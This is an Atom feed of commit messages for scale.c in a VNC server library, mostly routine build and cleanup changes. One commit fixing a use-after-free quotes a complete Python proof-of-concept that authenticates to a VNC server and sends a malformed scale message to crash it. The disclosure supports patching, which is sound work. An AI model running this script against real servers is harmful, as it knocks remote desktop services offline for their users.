libtdevnc/libvncserver/scale.c, branch r14.1.4 Shared TDE VNC library sources https://scm.trinitydesktop.org/cgit/libtdevnc/atom?h=r14.1.4 2019-02-06T15:56:55Z Merge tag 'LibVNCServer-0.9.12' 2019-02-06T15:56:55Z Slávek Banko slavek.banko@axis.cz 2019-02-06T15:56:55Z urn:sha1:f3f392caec43b4095bc1d84b315ed7972c13c144 Signed-off-by: Slávek Banko <slavek.banko@axis.cz> Removed _BSD_SOURCE, _SVID_SOURCE, _GNU_SOURCE, _XOPEN_SOURCE. 2018-10-08T12:59:54Z Michele Calgaro michele.calgaro@yahoo.it 2018-10-08T12:48:14Z urn:sha1:8c081c8888bccbf5adfe0fc4ec518e2cbfba9871 Signed-off-by: Michele Calgaro <michele.calgaro@yahoo.it> Fix building in C89 mode 2017-02-20T19:47:42Z Christian Beier dontmind@freeshell.org 2017-02-20T19:47:42Z urn:sha1:425e24196b7de15875d08c94c5ff59a6a3642654 FIXME: this should probably be refactored into a common header. Fix some typos (found by codespell) 2015-10-09T15:13:35Z Stefan Weil sw@weilnetz.de 2015-10-09T15:13:35Z urn:sha1:9c7efb7633ba62cd80c93e83284663f805bb3031 Signed-off-by: Stefan Weil <sw@weilnetz.de> Fix Use-After-Free vulnerability in LibVNCServer wrt scaling. 2014-10-21T15:33:28Z Christian Beier dontmind@freeshell.org 2014-10-21T15:33:28Z urn:sha1:668d3e3785bef9ee9a887192ee37f043d0d3c2f4 Reported by Ken Johnson <Ken.Johnson1@telus.com>. The vulnerability would occur in both the rfbPalmVNCSetScaleFactor and rfbSetScale cases in the rfbProcessClientNormalMessage function of rfbserver.c. Sending a valid scaling factor is required (non-zero) if (msg.ssc.scale == 0) { rfbLogPerror("rfbProcessClientNormalMessage: will not accept a scale factor of zero"); rfbCloseClient(cl); return; } rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbSetScaleMsg, sz_rfbSetScaleMsg); rfbLog("rfbSetScale(%d)\n", msg.ssc.scale); rfbScalingSetup(cl,cl->screen->width/msg.ssc.scale, cl->screen->height/msg.ssc.scale); rfbSendNewScaleSize(cl); << This is the call that can trigger a free. return; at the end, both cases there is a call the rfbSendNewScaleSize function, where if the connection is subsequently disconnected after sending the VNC scaling message can lead to a free occurring. else { rfbResizeFrameBufferMsg rmsg; rmsg.type = rfbResizeFrameBuffer; rmsg.pad1=0; rmsg.framebufferWidth = Swap16IfLE(cl->scaledScreen->width); rmsg.framebufferHeigth = Swap16IfLE(cl->scaledScreen->height); rfbLog("Sending a response to a UltraVNC style frameuffer resize event (%dx%d)\n", cl->scaledScreen->width, cl->scaledScreen->height); if (rfbWriteExact(cl, (char *)&rmsg, sz_rfbResizeFrameBufferMsg) < 0) { rfbLogPerror("rfbNewClient: write"); rfbCloseClient(cl); rfbClientConnectionGone(cl); << Call which may can lead to a free. return FALSE; } } return TRUE; Once this function returns, eventually rfbClientConnectionGone is called again on the return from rfbProcessClientNormalMessage. In KRFB server this leads to an attempt to access client->data. POC script to trigger the vulnerability: ---snip--- import socket,binascii,struct,sys from time import sleep class RFB: INIT_3008 = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x30\x38\x0a" AUTH_NO_PASS = "\x01" AUTH_PASS = "\x02" SHARE_DESKTOP = "\x01" def AUTH_PROCESS(self,data,flag): if flag == 0: # Get security types secTypeCount = data[0] secType = {} for i in range(int(len(secTypeCount))): secType[i] = data[1] return secType elif flag == 1: # Get auth result # 0 means auth success # 1 means failure return data[3] def AUTH_PROCESS_CHALLENGE(self, data, PASSWORD): try: from Crypto.Cipher import DES except: print "Error importing crypto. Please fix or do not require authentication" sys.exit(1) if len(PASSWORD) != 8: PASSWORD = PASSWORD.ljust(8, '\0') PASSWORD_SWAP = [self.reverse_bits(ord(PASSWORD[0])),self.reverse_bits(ord(PASSWORD[1])),self.reverse_bits(ord(PASSWORD[2])),self.reverse_bits(ord(PASSWORD[3])),self.reverse_bits(ord(PASSWORD[4])),self.reverse_bits(ord(PASSWORD[5])),self.reverse_bits(ord(PASSWORD[6])),self.reverse_bits(ord(PASSWORD[7]))] PASSWORD = (struct.pack("BBBBBBBB",PASSWORD_SWAP[0],PASSWORD_SWAP[1],PASSWORD_SWAP[2],PASSWORD_SWAP[3],PASSWORD_SWAP[4],PASSWORD_SWAP[5],PASSWORD_SWAP[6],PASSWORD_SWAP[7])) crypto = DES.new(PASSWORD) return crypto.encrypt(data) def reverse_bits(self,x): a=0 for i in range(8): a += ((x>>i)&1)<<(7-i) return a def main(argv): print "Proof of Concept" print "Copyright TELUS Security Labs" print "All Rights Reserved.\n" try: HOST = sys.argv[1] PORT = int(sys.argv[2]) except: print "Usage: python setscale_segv_poc.py <host> <port> [password]" sys.exit(1) try: PASSWORD = sys.argv[3] except: print "No password supplied" PASSWORD = "" vnc = RFB() remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM) remote.connect((HOST,PORT)) # Get server version data = remote.recv(1024) # Send 3.8 version remote.send(vnc.INIT_3008) # Get supported security types data = remote.recv(1024) # Process Security Message secType = vnc.AUTH_PROCESS(data,0) if secType[0] == "\x02": # Send accept for password auth remote.send(vnc.AUTH_PASS) # Get challenge data = remote.recv(1024) # Send challenge response remote.send(vnc.AUTH_PROCESS_CHALLENGE(data,PASSWORD)) elif secType[0] == "\x01": # Send accept for None pass remote.send(vnc.AUTH_NO_PASS) else: print 'The server sent us something weird during auth.' sys.exit(1) # Get result data = remote.recv(1024) # Process result result = vnc.AUTH_PROCESS(data,1) if result == "\x01": # Authentication failure. data = remote.recv(1024) print 'Authentication failure. Server Reason: ' + str(data) sys.exit(1) elif result == "\x00": print "Authentication success." else: print 'Some other authentication issue occured.' sys.exit(1) # Send ClientInit remote.send(vnc.SHARE_DESKTOP) # Send malicious message print "Sending malicious data..." remote.send("\x08\x08\x00\x00") remote.close() if __name__ == "__main__": main(sys.argv) ---snap--- Make sure that no integer overflow could occur during scaling 2014-10-06T18:13:00Z newsoft newsoft@gmx.fr 2014-10-06T18:13:00Z urn:sha1:8220f4da4c4f42d8208f09346414f15121153da6 Fix compilation in c89 mode. 2011-04-28T09:42:59Z George Kiagiadakis kiagiadakis.george@gmail.com 2010-11-10T18:57:13Z urn:sha1:35246edddd952a6d83511f69cba47536495e4700 Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de> Cleanup: remove CORBA stuff. 2010-09-13T12:17:43Z Christian Beier dontmind@freeshell.org 2010-09-06T14:12:30Z urn:sha1:0df84e5c27eefad8b731b12d58f8fbede71823e0 The header file and most of the functions referred to do not exist in libvncserver. Signed-off-by: Christian Beier <dontmind@freeshell.org> Add ZYWRLE server-side support (thanks Noriaki Yamazaki, Hitachi) 2008-01-29T11:50:16Z dscho dscho 2008-01-29T11:50:16Z urn:sha1:059afcdf819f63a5ac3a93ef3060fd172234ab82 Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de> The great UltraVNC Compatibility Commit 2006-05-15T05:37:39Z steven_carr steven_carr 2006-05-15T05:37:39Z urn:sha1:ccdbe8f3256c3c776a1cc1a0517a38437b9e2c65